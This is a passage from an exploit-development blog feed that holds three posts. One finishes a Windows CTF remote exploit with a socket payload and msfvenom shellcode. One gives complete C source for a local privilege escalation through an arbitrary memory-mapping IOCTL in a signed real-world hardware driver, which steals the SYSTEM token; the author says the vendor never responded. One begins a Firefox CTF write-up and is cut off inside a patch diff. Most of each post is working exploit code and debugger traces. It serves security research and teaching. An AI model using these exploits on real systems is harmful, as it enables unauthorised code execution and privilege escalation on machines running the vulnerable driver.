If we can get to this last basic block the program will jump exactly to length+1 of input buffer on the heap which contains the bytes that have been written during initialization. At this point, we control the stack to some extent and can influence to which exact byte of the pre-initialized heap memory we jump. The following PoC brings us to this point.

Poc_0x01

#!/usr/bin/env python3
import sys, socket, struct
p32 = lambda x: struct.pack('<I', x);

TARGET = '127.0.0.1'
PORT = 31415

sc = b""

p=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
p.connect((TARGET,PORT))

# handshake
p.send(b"Hello\x00")
p.recv(3) # Hi\x00

buf =  b""
buf += b"Eko2022\x00" # magic value  
buf += b"T" # packet type
buf += b"\xff\xff" # sign/type confusion


iret = b""
iret += p32(0x41414141) 	
iret += p32(0x42424242) 			
iret += p32(0x43434343) 	
iret += p32(0x44444444) 	
iret += p32(0x45454545)	

buf += iret
buf += sc
buf += b"A"*(0x0f00-len(iret)-len(sc))
buf += b"X" # X leads to packet type confusion
buf += b"B"*0x07 # we want pops, avoid pushs
p.send(buf)
p.recv(1)
p.close() 

When we break on the call instruction we can see that we land on the heap and can single step until the iret instruction. Note that we chose the input length in a way we avoid the pushs and land right at the pops in order to fully control the stack at the moment iret is called.

bp bfs_eko2022+0x146E
g
Breakpoint 0 hit
bfs_eko2022+0x146e:
00007ff7`c7f2146e ff158cab0000    call    qword ptr [bfs_eko2022+0xc000 (00007ff7`c7f2c000)] ds:00007ff7`c7f2c000=0000000010000f08
0:000> t
00000000`10000f08 58              pop     rax
0:000> p
00000000`10000f09 58              pop     rax
0:000> 
00000000`10000f0a 58              pop     rax
0:000> 
00000000`10000f0b 58              pop     rax
0:000> 
00000000`10000f0c 58              pop     rax
0:000> 
00000000`10000f0d 58              pop     rax
0:000> 
00000000`10000f0e 58              pop     rax
0:000> 
00000000`10000f0f cf              iretd
0:000> dd rsp
00000000`005eeb50  41414141 42424242 43434343 44444444
00000000`005eeb60  45454545 41414141 41414141 41414141

At this point, we have to do some digging on how iret works to see if we can craft the stack in a way that would let us gain (custom-) code execution. The iret instruction is used to return control from an exception or interrupt handler and is expecting the following values on the stack (very good article on this topic):

- new instruction pointer
- new code segment selector (CS)
- new value of EFLAGS register 
- new stack pointer
- new stack segment selector (SS)

As for the instruction pointer and stack pointer we could just point them into our heap buffer since we control a large part of it. The EFLAGS register we can get from debugging and then attempt to use the same value. This leaves us with CS and SS which is a bit tricky. CS and SS are used to index into the Global Descriptor Table (GDT) which has descriptors for kernel code/data and user code/data. Using WinDBG as a kernel debugger we can see which indices match which descriptor:

0: kd> dd @gdtr
fffff807`39e95fb0  00000000 00000000 00000000 00000000
fffff807`39e95fc0  00000000 00209b00 00000000 00409300
fffff807`39e95fd0  0000ffff 00cffb00 0000ffff 00cff300
fffff807`39e95fe0  00000000 0020fb00 00000000 00000000
fffff807`39e95ff0  40000067 39008be9 fffff807 00000000
fffff807`39e96000  00003c00 0040f300 00000000 00000000
fffff807`39e96010  00000000 00000000 00000000 00000000

The first 16 bytes are reserved, following those we can see that there are some values at offset 0x10 and 0x18:

0: kd> dg 0x10
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0010 00000000`00000000 00000000`00000000 Code RE Ac 0 Nb By P  Lo 0000029b
0: kd> dg 0x18
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0018 00000000`00000000 00000000`00000000 Data RW Ac 0 Bg By P  Nl 00000493

These should be the entries for the kernel. Then we have 2 more values following:

0: kd> dg 0x20
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0020 00000000`00000000 00000000`ffffffff Code RE Ac 3 Bg Pg P  Nl 00000cfb
0: kd> dg 0x28
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0028 00000000`00000000 00000000`ffffffff Data RW Ac 3 Bg Pg P  Nl 00000cf3

These are the user code and stack descriptors ranging from 0 to 0xffffffff. The 2 least significant bits of the selector value are being used for RPL (Requested Privilege Level) or CPL (Current Privilege Level). Because we are looking to stay in ring3 we have to set these to 1 – so 0x20 for the code segment becomes 0x23 and 0x28 becomes 0x2b.

CS and SS are only used in 32-bit mode (see: https://nixhacker.com/segmentation-in-intel-64-bit/) or lower – by supplying values there for our iret we will switch to 32-bit mode. With this bit of theory out of the way we still have a problem: 0x2b is a bad byte and will not end up on the stack! So we can choose 0x23 for the code segment but have to be creative on what to use for the stack segment.

Any value that will not crash on iret is fine in theory so it has to be Data RW but we don’t necessarily need a valid stack base and limit if we can avoid using the stack. After inspecting more values and seeing which ones do and don’t crash we eventually find 0x53:

0:000> dg 0x53
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0053 00000000`0060a000 00000000`00000fff Data RW Ac 3 Bg By P  Nl 000004f3

From the output, we can see that base and limit are not really useful for us but if we avoid the stack we should be fine (base and limit are also somewhat random and can change at reboots). Now it’s time to update the PoC:

PoC_0x02

...
sc =  b""
sc += b"\xcc"
sc += b"\x90"*100
...
iret = b""
iret += p32(0x10000014) 	
iret += p32(0x23) 			 
iret += p32(0x00010202) 	
iret += p32(0x10000400) 	
iret += p32(0x53)
...

Debugging the new PoC shows that we indeed end up in 32-bit mode inside our shellcode and can execute it!

0:000> 
00000000`10000f0f cf              iretd
0:000> dd rsp
00000000`00cfede0  10000014 00000023 00010202 10000400
00000000`00cfedf0  00000053 41414141 41414141 41414141
0:000> g
10000014 cc              int     3
0:000:x86> p
10000015 90              nop
0:000:x86> p
10000016 90              nop

Any attempt to use the stack will however fail (Note that WinDBG will automatically repair 0x53 back to 0x2b if you are single stepping – this can be confusing!). This means we will need to find a way to use the ability to execute shellcode to restore either stack functionality or get back to 64-bit.

As it turns out there is exactly such a thing. By using a far jump like this 0x33:0x100000xx we can specify 0x33 as the new code segment which will get us back to 64-bit. Since 64-bit does not need a stack segment selector we can now use the stack again! The only thing left to do (besides generating valid shellcode) is to restore the stack pointer. Luckily debugging shows that RCX still holds a reference to the stack so we can just copy it into RSP. After executing the jump into 64-bit mode we can now continue to execute 64-bit shellcode to restore the stack and then anything we like:

PoC_0x03

...
sc =  b""
sc += b"\xcc"
sc += b"\xea\x1c\x00\x00\x10\x33\x00" # from 0x10000014 0x1000001c
sc += b"\x48\x89\xC8\x48\x89\xC4" # restore original stack from ref in rcx
sc += b"\xcc"
...

Note that even though 0x33 is a bad byte this is only true for the stack – on the heap where the shellcode lies it will be unchanged. Debugging shows the swap back to 64-bit:

10000014 cc                      int     3
0:000:x86> p
10000015 ea1c0000103300          jmp     0033:1000001C
0:000:x86> p
00000000`1000001c 4889c8          mov     rax,rcx
0:000> p
00000000`1000001f 4889c4          mov     rsp,rax
0:000> 
00000000`10000022 cc              int     3

For the final exploit, all that is left to do is generate some shellcode, e.g. msfvenom -p windows/x64/exec cmd="calc" -f python .

Final PoC

#!/usr/bin/env python3
# Author: @xct_de

import sys, socket, struct
p32 = lambda x: struct.pack('<I', x);

TARGET = '127.0.0.1'
PORT = 31415

sc =  b""
#sc += b"\xcc"

sc += b"\xea\x1c\x00\x00\x10\x33\x00" # from 0x10000014 (x86) 0x1000001c (x64)
sc += b"\x48\x89\xC8\x48\x89\xC4"     # restore original stack from rcx

# msfvenom -p windows/x64/exec cmd="calc" -f python
sc += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51"
sc += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
sc += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
sc += b"\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0"
sc += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
sc += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
sc += b"\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
sc += b"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
sc += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
sc += b"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
sc += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
sc += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
sc += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
sc += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
sc += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
sc += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
sc += b"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48"
sc += b"\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d"
sc += b"\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5"
sc += b"\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
sc += b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
sc += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89"
sc += b"\xda\xff\xd5\x63\x61\x6c\x63\x00"

p=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
p.connect((TARGET,PORT))

# handshake
p.send(b"Hello\x00")
p.recv(3) # Hi\x00

buf = b""
buf += b"Eko2022\x00" # magic value  
buf += b"T" # packet type
buf += b"\xff\xff" # sign/type confusion

# switch from 64-bit to 32-bit via iret
iret = b""
iret += p32(0x10000014) 	
iret += p32(0x23) 			  
iret += p32(0x00010202) 	
iret += p32(0x10000400) 	
iret += p32(0x53)			    

buf += iret
buf += sc
buf += b"A"*(0x0f00-len(iret)-len(sc))
buf += b"X" # X leads to packet type confusion
buf += b"B"*0x07 # we want pops, avoid pushs
p.send(buf)
p.recv(1)
p.close() 

The post Ekoparty 2022 BFS Windows Challenge appeared first on Vulndev.

Windows Kernel Exploitation – Arbitrary Memory Mapping (x64)

By: xct
24 September 2022 at 11:09

In this post, we will develop an exploit for the HW driver. I picked this one because I looked for some real-life target to practice on and saw a post by Avast that mentioned vulnerabilities in an old version of this driver (Version 4.8.2 from 2015), that was used as part of a bigger exploit chain. Unfortunately, I could not find this one available for download so I ended up using the most recent version, 4.9.8 at the time of writing this post. This driver is signed by Microsoft so we can load it even without a kernel debugger attached (the certificate is expired since 2021 but that does not really prevent loading).

Advisory: https://ssd-disclosure.com/ssd-advisory-mts-hw-driver-escalation-of-privileges/

I started by trying to find the IOCTLs mentioned in the post but they do not exist anymore. Luckily the drivers provided some other relatively easy exploitable looking IOCTLs so I gave it a shot.

Vulnerability Discovery

Before starting the look at the driver in IDA I gave this excellent intro post by Voidsec another read to see what kind of starting points to look for:

  • MmMapIoSpace
  • rdmsr
  • wrmsr

At the end of the post, he mentions looking for MmMapIoSpace as an exercise which is something that we have in this driver as well. In the end, I ended up using a different function though.

After opening the driver IDA we look at the imports and can see a couple of functions that handle memory mappings:

Besides the already mentioned MmMapIoSpace there are a couple of other interesting functions here that we can potentially use, including MmMapLockedPages. Let’s see what both functions do:

PVOID MmMapIoSpace(
  [in] PHYSICAL_ADDRESS    PhysicalAddress,
  [in] SIZE_T              NumberOfBytes,
  [in] MEMORY_CACHING_TYPE CacheType
);

MmMapIoSpace allows mapping a physical memory address to a virtual (kernel-mode) address. This can be useful if you can control the arguments to the function, especially the first 2, through some IOCTL. In this driver, this is indeed the case with one of the IOCTLs but the memory is never mapped to a user-mode address afterward or returned, so I could not do much with it besides crashing the system (by mapping an invalid address). If this address would be mapped to a user-mode address and returned it can be exploited. There is an excellent post here on how to do it. Let’s look at the other function for now:

PVOID MmMapLockedPages(
  [in] PMDL MemoryDescriptorList,
  [in] __drv_strictType(KPROCESSOR_MODE / enum _MODE,__drv_typeConst)KPROCESSOR_MODE AccessMode
);

This function (which is deprecated according to Microsoft) allows mapping a virtual address to another one and takes in a pointer to a Memory Descriptor List (MDL). Usually, a call to this function is preceded by the following calls:

PMDL IoAllocateMdl(
  [in, optional]      __drv_aliasesMem PVOID VirtualAddress,
  [in]                ULONG                  Length,
  [in]                BOOLEAN                SecondaryBuffer,
  [in]                BOOLEAN                ChargeQuota,
  [in, out, optional] PIRP                   Irp
);

void MmBuildMdlForNonPagedPool(
  [in, out] PMDL MemoryDescriptorList
);

IoAllocateMdl takes a virtual memory address & length (we ignore the other arguments for now) and will result in an MDL that is large enough to map our requested buffer size (but not filled yet). The following MmBuildMdlForNonPagedPool will then update the structure with the information about the underlying physical pages that back the virtual memory we requested. Finally MmMapLockedPages takes this pointer to the MDL & returns another address in user-mode virtual memory where the physical pages described by the MDL have been mapped to.

This essentially means that if the 3 functions are executed in the order described, we create a second virtual address that maps to the same physical address as the initial virtual address.

With this theory out of the way, let’s see if and how we can reach this chain of functions. By following the references in IDA we can see that it’s used a few times throughout the program but only in 2 functions:

The path we are going to follow is sub_2E80 (also worth exploring the other one though). When we look at this function we first see a couple of checks being done on the arguments before it eventually ends up in the sequence of functions we just discussed:

For the checks inside the function, we will have a look in the debugger later since some of them might just not matter much to us (e.g. some might be automatically passed without any work from our side). For now, we focus on discovering how to reach this function in the first place. We look for references again and find quite a few:

All those refs are coming from the same function which is essentially a big switch/if/else construct for the different IOCTLs that this driver supports. Here we just go for the first one and follow the back-edges in IDA until we hit an IOCTL at 0x3F70:

cmp     [rsp+0D8h+var_24], 9C406500h
jz      loc_52D8

So with a potential IOCTL that can get close to the code path we want, we quickly check the driver start function which calls sub_1E80 and has the string we need in order to use CreateFile to get a handle to the driver.

Now we can write our first template and debug the driver:

#include "windows.h"
#include <stdio.h>

#define QWORD ULONGLONG
#define IOCTL_01 0x9C406500

int main() {
    DWORD index = 0;
    DWORD bytesWritten = 0;

    HANDLE hDriver = CreateFile(L"\\\\.\\HW", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }    
   
    LPVOID uInBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPVOID uOutBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    QWORD* in = (QWORD*)((QWORD)uInBuf);
    *(in + index++) = 0x4141414142424242;
    *(in + index++) = 0x4343434344444444; 
    *(in + index++) = 0x4545454546464646;              

    DeviceIoControl(hDriver, IOCTL_01, (LPVOID)uInBuf, 0x1000, uOutBuf, 0x1000, &bytesWritten, NULL);

    return 0;
}

Before running the driver, we set a breakpoint on the IOCTL comparison so we can follow the execution flow in the debugger:

0: kd>.reload
0: kd> lm m hw64
Browse full module list
start             end                 module name
fffff806`5c1a0000 fffff806`5c1aa000   hw64       (deferred)
0: kd> ba e1 hw64+0x3F70
0: kd> g
...
Breakpoint 0 hit
hw64+0x3f70:
fffff806`5c1a3f70 81bc24b40000000065409c cmp dword ptr [rsp+0B4h],9C406500h

Now that we hit the breakpoint, we continue to step through the code and inspect the source of every comparison to make sure that we track any dependencies on our input buffer. After a few instructions, we hit a call to our target function at hw64+0x532b:

1: kd> 
hw64+0x532b:
fffff806`5c1a532b e850dbffff      call    hw64+0x2e80 (fffff806`5c1a2e80)
1: kd> r
rax=000000009c406500 rbx=ffffbb08113f9540 rcx=ffffbb080fc63000
rdx=0000000000000000 rsi=0000000000000002 rdi=0000000000000001
rip=fffff8065c1a532b rsp=ffffcb0d5189e700 rbp=ffffcb0d5189e881
 r8=ffffbb080e9c26c0  
1: kd> dq rcx
ffffbb08`0fc63000  41414141`42424242 43434343`44444444
ffffbb08`0fc63010  45454545`46464646 00000000`00000000
1: kd> t

We can see that this function takes our input buffer as the first argument – more precisely a copy of it since we can see that it’s at a kernel address. We step into the function and look for comparisons again.

1: kd> 
hw64+0x2ef0:
fffff806`5c1a2ef0 488b8424e0000000 mov     rax,qword ptr [rsp+0E0h]
1: kd> 
hw64+0x2ef8:
fffff806`5c1a2ef8 4883781000      cmp     qword ptr [rax+10h],0
1: kd> dq rax+10
ffffbb08`0fc63010  45454545`46464646 

Part of our input is compared to zero – if we trace the instructions in IDA we can see that in order to get to our vulnerable code block we need to not take the jump. So this is fine for now. In the next basic block the same comparison is done again and we also pass the check. This is repeated once more and we finally get to the block at hw64+0x2F60 that has the call to IoAllocateMdl.

1: kd> 
hw64+0x2f7f:
fffff806`5c1a2f7f ff155b410000    call    qword ptr [hw64+0x70e0 (fffff806`5c1a70e0)]
1: kd> r
rax=ffffbb080fc63000 rbx=ffffbb08113f9540 rcx=4545454546464646
rdx=0000000044444444 rsi=0000000000000002 rdi=0000000000000001
rip=fffff8065c1a2f7f rsp=ffffcb0d5189e620 rbp=ffffcb0d5189e881
 r8=0000000000000000  r9=0000000000000000

Let’s match the arguments to the function signature:

PMDL IoAllocateMdl(
  [in, optional]      __drv_aliasesMem PVOID VirtualAddress,  // 4545454546464646
  [in]                ULONG                  Length,          // 0000000044444444 
  [in]                BOOLEAN                SecondaryBuffer, // 0
  [in]                BOOLEAN                ChargeQuota,     // 0
  [in, out, optional] PIRP                   Irp              // 0 (on stack)
);

We can see that we control the VirtualAddress it’s getting an MDL for and the size. The values we provided are obviously useless but they helped us to trace our user input. The function actually doesn’t complain and we can step over it (since it only allocates the memory for the MDL). If we step further we hit MmBuildMdlForNonPagedPool:

1: kd> 
hw64+0x2f97:
fffff806`5c1a2f97 ff153b410000    call    qword ptr [hw64+0x70d8 (fffff806`5c1a70d8)]
1: kd> r
rax=ffffbb080d010000 rbx=ffffbb08113f9540 rcx=ffffbb080d010000

Which maps to this call:

void MmBuildMdlForNonPagedPool(
  [in, out] PMDL MemoryDescriptorList // ffffbb080d010000
);

This will now result in a BSOD since the size we requested is way too large and the address is bogus.

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffa9a2a2a32320, memory referenced.

At this point, we know what our input buffer should look like to get an arbitrary memory mapping and we can continue with the exploitation section.

Exploitation

After having discovered the vulnerable IOCTL it’s time to start the exploitation process. Assuming we can map any kernel virtual address into a user-mode address – what could a good target be? A commonly used payload for kernel exploits is token stealing shellcode. We do not really need shellcode for escalating privileges though because we can copy the token of a SYSTEM process to our current process using the mapping mechanism as a read/write primitive (data-only attack). Executing shellcode is also possible but not in scope for this post. The plan of attack is as follows:

  • Get the address of a SYSTEM process and read the Token pointer
  • Get the address of our current process and overwrite the Token pointer with the one from the SYSTEM process

We can use NtQuerySystemInformation to get the address of a SYSTEM process in memory without using any exploit. We are then going to use our mapping primitive to map the memory where the process is located to a user-mode address. This allows us to read the fields of the EPROCESS structure including the Token, UniqueProcessId and ActiveProcessLinks, of which we can get offsets via the debugger:

1: kd> dt _EPROCESS
ntdll!_EPROCESS
   ....
   +0x440 UniqueProcessId  : Ptr64 Void
   +0x448 ActiveProcessLinks : _LIST_ENTRY
   ...
   +0x4b8 Token            : _EX_FAST_REF
   ...

We are updating the PoC to map the SYSTEM process & compare that the data of the mapped area & the original virtual address are indeed the same:

#include "windows.h"
#include <stdio.h>

#define QWORD ULONGLONG
#define IOCTL_01 0x9C406500

#define SystemHandleInformation 0x10
#define SystemHandleInformationSize 1024 * 1024 * 2

using fNtQuerySystemInformation = NTSTATUS(WINAPI*)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
    );

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

typedef NTSTATUS(NTAPI* _NtQueryIntervalProfile)(
    DWORD ProfileSource,
    PULONG Interval
);

QWORD getSystemEProcess() {
    ULONG returnLenght = 0;
    fNtQuerySystemInformation NtQuerySystemInformation = (fNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll"), "NtQuerySystemInformation");
    PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);
    NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLenght);
    SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[0];
    return (QWORD)handleInfo.Object;
}

QWORD mapArbMem(QWORD addr, HANDLE hDriver) {
    DWORD index = 0;
    DWORD bytesWritten = 0;
    LPVOID uInBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPVOID uOutBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    QWORD* in = (QWORD*)((QWORD)uInBuf);
    *(in + index++) = 0x4141414142424242;
    *(in + index++) = 0x4343434300001000; // size
    *(in + index++) = addr;               // addr

    DeviceIoControl(hDriver, IOCTL_01, (LPVOID)uInBuf, 0x1000, uOutBuf, 0x1000, &bytesWritten, NULL);
    QWORD* out = (QWORD*)((QWORD)uOutBuf);
    QWORD mapped = *(out + 2);
    return mapped;
}

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HW", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }       

    printf("[>] Exploiting driver..\n");
    QWORD systemProc = getSystemEProcess();
    printf("System Process: %llx\n", systemProc);

    QWORD systemProcMap = mapArbMem(systemProc, hDriver);    
    printf("System Process Mapping: %llx\n", systemProcMap);

    getchar();
    DebugBreak();
    return 0;
}

The getchar() gives us the chance to copy the addresses out and the DebugBreak() conveniently breaks in the context of our process.

[>] Exploiting driver..
System Process: ffff850120cab040
System Process Mapping: 1ce40870040
...
1: kd> dq ffff850120cab040
ffff8501`20cab040  00000000`00000003 ffff8501`20cab048
ffff8501`20cab050  ffff8501`20cab048 ffff8501`20cab058
1: kd> dq 1ce40870040
000001ce`40870040  00000000`00000003 ffff8501`20cab048
000001ce`40870050  ffff8501`20cab048 ffff8501`20cab058

As expected, we got a mapping of the target address. We did not cover the output buffer yet – essentially if we inspect it after triggering the IOCTL with valid arguments we get something like the following back, which has the mapped user-mode address as the 3rd value:

 ffff850127c16970 4343434300001000 1ce40870040 00000000 ...

At this point, all that is left to do is read the SYSTEM token and then iterate through the ActiveProcessLinks linked list until we find our own process. When we find it, we overwrite our own Token with the SYSTEM one and are done. The final exploit implementing this can be found below:

#include "windows.h"
#include <stdio.h>

// Author: @xct_de
// Target: Windows 11 (10.0.22000)

#define QWORD ULONGLONG
#define IOCTL_01 0x9C406500

#define SystemHandleInformation 0x10
#define SystemHandleInformationSize 1024 * 1024 * 2

using fNtQuerySystemInformation = NTSTATUS(WINAPI*)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
    );

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

typedef NTSTATUS(NTAPI* _NtQueryIntervalProfile)(
    DWORD ProfileSource,
    PULONG Interval
);

QWORD getSystemEProcess() {
    ULONG returnLenght = 0;
    fNtQuerySystemInformation NtQuerySystemInformation = (fNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll"), "NtQuerySystemInformation");
    PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);
    NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLenght);
    SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[0];
    return (QWORD)handleInfo.Object;
}

QWORD mapArbMem(QWORD addr, HANDLE hDriver) {
    DWORD index = 0;
    DWORD bytesWritten = 0;
    LPVOID uInBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPVOID uOutBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    QWORD* in = (QWORD*)((QWORD)uInBuf);
    *(in + index++) = 0x4141414142424242;
    *(in + index++) = 0x4343434300001000; // size
    *(in + index++) = addr;               // addr

    DeviceIoControl(hDriver, IOCTL_01, (LPVOID)uInBuf, 0x1000, uOutBuf, 0x1000, &bytesWritten, NULL);
    QWORD* out = (QWORD*)((QWORD)uOutBuf);
    QWORD mapped = *(out + 2);
    return mapped;
}

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HW", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }    

    printf("[>] Exploiting driver..\n");
    QWORD systemProc = getSystemEProcess();
    QWORD systemProcMap = mapArbMem(systemProc, hDriver);
    QWORD systemToken = (QWORD)(*(QWORD*)(systemProcMap + 0x4b8));
    printf("[>] System Token: 0x%llx\n", systemToken);

    DWORD currentProcessPid = GetCurrentProcessId();
    BOOL found = false;
    QWORD cMapping = systemProcMap;
    DWORD cPid = 0;
    QWORD cTokenPtr = 0;
    while (!found) {
        QWORD readAt = (QWORD)(*(QWORD*)(cMapping + 0x448)); 
        cMapping = mapArbMem(readAt - 0x448, hDriver);
        cPid = (DWORD)(*(DWORD*)(cMapping + 0x440));
        cTokenPtr = (QWORD)(*(QWORD*)(cMapping + 0x4b8));
        if (cPid == currentProcessPid) {
            found = true;
            break;
        }
    }
    if (!found) {
        exit(-1);
    }
    printf("[>] Stealing Token..\n");
    *(QWORD*)(cMapping + 0x4b8) = systemToken;
    system("cmd");
    printf("[>] Restoring Token..\n");
    *(QWORD*)(cMapping + 0x4b8) = cTokenPtr;
    return 0;
}

SYSTEM \o/

I reported the vulnerability to SSD which then contacted the vendor. Unfortunately, the vendor never responded.

The post Windows Kernel Exploitation – Arbitrary Memory Mapping (x64) appeared first on Vulndev.

Browser Exploitation: Firefox OOB to RCE

By: xct
9 September 2022 at 11:19

Intro

In this post, we will exploit Midenios, a good introductory browser exploitation challenge that was originally used for the HackTheBox Business-CTF. I had some experience exploiting IE/Edge/Chrome before, but exploiting Firefox was mostly new to me. I solved this challenge way after the CTF so I had some existing writeups to fall back on. There were a lot of excellent resources that helped with developing the exploit, here are some of them:

Definitely check out the write-up by 0xten because it follows a different exploitation path after obtaining the read/write primitive. Since it’s been a long time since I did anything with Firefox there might be some inaccuracies – if you find something please let me know I want to learn more :)

Vulnerability

The challenge itself has a website that allows you to submit unsanitized HTML input which is later visited by a bot. We can submit script tags to achieve a “persistent” XSS: <script src="http://127.0.0.1/exploit.js"></script>. The bot is using a vulnerable, custom-patched version of Firefox to visit the page and is executing the user-provided JavaScript.

Besides the website, we are provided an archive that contains a “patch.diff” which shows the changes made to the code base, and a “mozconfig” that shows that debug mode is enabled.

mozconfig

ac_add_options --enable-debug

patch.diff (shorted and commented, all changes to js/src/vm/ArrayBufferObject.cpp,js/src/vm/ArrayBufferObject.h):

# added a setter for byteLength 
-    JS_PSG("byteLength", ArrayBufferObject::byteLengthGetter, 0),
+    JS_PSGS("byteLength", ArrayBufferObject::byteLengthGetter, ArrayBufferObject::byteLengthSetter, 0),


# added implementation for the byteLength setter
+MOZ_ALWAYS_INLINE bool ArrayBufferObject::byteLengthSetterImpl(
+    JSContext* cx, const CallArgs& args) {
+  MOZ_ASSERT(IsArrayBuffer(args.thisv()));
+
+  // Steps 1-2
+  auto* buffer = &args.thisv().toObject().as<ArrayBufferObject>();
+  if (buffer->isDetached()) {
+    JS_ReportErrorNumberASCII(cx, GetErrorMessage, nullptr,
+                              JSMSG_TYPED_ARRAY_DETACHED);
+    return false;
+  }
+
+  // Step 3
+  double targetLength;
+  if (!ToInteger(cx, args.get(0), &targetLength)) {
